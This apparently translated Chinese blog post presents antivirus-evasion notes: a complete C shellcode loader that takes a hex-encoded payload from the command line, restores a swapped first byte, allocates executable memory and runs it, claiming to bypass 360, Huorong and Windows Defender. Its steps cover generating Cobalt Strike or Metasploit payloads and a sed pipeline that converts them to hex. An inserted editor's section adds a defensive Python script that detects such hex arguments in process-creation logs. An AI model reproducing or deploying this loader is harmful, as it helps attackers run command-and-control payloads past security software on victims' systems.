loecho@垃圾桶

Static AV-evasion study notes: hex-string reversal to bypass AV

2020-09-15 · 2 min read
Practical tips

0x01 Code:

  • Bypasses 360, Huorong and Windows Defender
#include <stdio.h>
#include <string.h>
#include <Windows.h>

#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // hide the console window

int main(int argc, char* argv[]) {

	if (argc < 2) {
		return 1; // nothing to decode without the hex string argument
	}

	unsigned int char_in_hex;
	char* info = argv[1]; // read the hex string from the command line
	unsigned int memory_allocation = strlen(info) / 2; // two hex digits per byte

	// Convert the hex string back into raw bytes, in place.
	// The loop is bounded by the number of bytes, so sscanf_s never reads past the end of the string.
	for (unsigned int i = 0; i < memory_allocation; i++) {
		sscanf_s(info + 2 * i, "%2X", &char_in_hex);
		info[i] = (char)char_in_hex;
	}

	// The first byte of the shellcode is replaced in the input; after loading into memory it is swapped back.

	char first[] = "\xfc";
	void* exec = VirtualAlloc(0, memory_allocation, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
	memcpy(info, first, 1);
	memcpy(exec, info, memory_allocation);
	DWORD ignore;
	VirtualProtect(exec, memory_allocation, PAGE_EXECUTE, &ignore);
	typedef void(*some_one)();
	some_one func = (some_one)exec;
	func();

	return 0;
}
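The loader above receives the entire payload as a hex string in argv[1], which means the full encoded payload ends up in process-creation telemetry (Sysmon Event ID 1, or Security 4688 with command-line auditing enabled) every time it runs. Because the post swaps the first byte and restores it at runtime, matching the decoded bytes on the usual leading `\xfc` does not work; a detection keyed on the delivery channel does. The following triage script is an added example by the editor, not code from the post: it scans constructed process-creation records for a payload-sized hex-only token, decodes it and reports its size and entropy. The field names `Image` and `CommandLine`, the threshold `MIN_HEX_CHARS` and the sample records are assumptions, and the long hex argument is seeded pseudo-random filler, not shellcode.

```python
import math
import random
import re
from collections import Counter

# Minimum length (in hex digits) for a command-line token to be treated as a
# possible encoded payload. 200 hex digits = 100 bytes, longer than any common
# digest passed on a command line (SHA-512 is 128 hex digits), so hashes are not flagged.
MIN_HEX_CHARS = 200

# A run of hex digits that is not part of a longer alphanumeric word.
HEX_TOKEN = re.compile(
    r"(?<![0-9A-Za-z])[0-9A-Fa-f]{%d,}(?![0-9A-Za-z])" % MIN_HEX_CHARS
)

# Constructed filler standing in for an encoded argument: 320 pseudo-random bytes
# from a fixed seed, rendered as hex. It is not shellcode.
_rng = random.Random(20200915)
FILLER_HEX = bytes(_rng.randrange(256) for _ in range(320)).hex()

# Constructed process-creation records in the shape of Sysmon Event ID 1 /
# Security 4688 fields (assumed field names, not data from the post).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\PING.EXE",
     "CommandLine": "ping.exe -n 4 10.0.0.1"},
    {"Image": r"C:\Users\user\Desktop\loader.exe",
     "CommandLine": 'loader.exe "%s"' % FILLER_HEX},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -hashfile file.bin SHA256"},
    {"Image": r"C:\tools\verify.exe",
     "CommandLine": "verify.exe --expected " + "ab" * 32},  # a 64-digit SHA-256: below threshold
]


def find_hex_blobs(command_line: str) -> list:
    """Return every hex-only token in the command line at least MIN_HEX_CHARS long."""
    return [m.group(0) for m in HEX_TOKEN.finditer(command_line)]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte of the empirical distribution; random-looking data scores near 8."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def analyse_event(event: dict):
    """Return a finding for one record, or None if no payload-sized hex token is present."""
    blobs = find_hex_blobs(event["CommandLine"])
    if not blobs:
        return None
    blob = max(blobs, key=len)
    # An odd-length token cannot be a clean byte string; drop the trailing digit so it decodes.
    decoded = bytes.fromhex(blob if len(blob) % 2 == 0 else blob[:-1])
    return {
        "image": event["Image"],
        "hex_chars": len(blob),
        "decoded_bytes": len(decoded),
        "entropy": round(shannon_entropy(decoded), 2),
    }


def scan(events: list) -> list:
    """Run analyse_event over a list of records and keep only the findings."""
    return [f for f in (analyse_event(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Only the loader record is reported; the ping, certutil and 64-digit digest arguments fall below the threshold. The entropy value is a secondary signal: a decoded argument of a few hundred bytes that scores near 8 bits per byte is far more likely to be an encoded blob than any text a program would normally take on its command line.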



0x02 Usage:

  1. Generate a C-language payload with CS or MSF:

     [screenshot]

  2. String processing: from the generated C file, keep only the shellcode part:

     [screenshot]

  3. Process it with Linux commands to produce the hex string, then load it with the compiled exe:

cat shell.txt | grep -v unsigned | sed "s/\"\\\x//g" | sed "s/\\\x//g" | sed "s/\"//g" | sed ':a;N;$!ba;s/\n//g' | sed "s/;//g"

     [screenshot]

  4. Load test:

     [screenshot]
     [screenshot]

0x03 To do

Follow-up: add a custom algorithm and a simple sandbox check to achieve evasion.
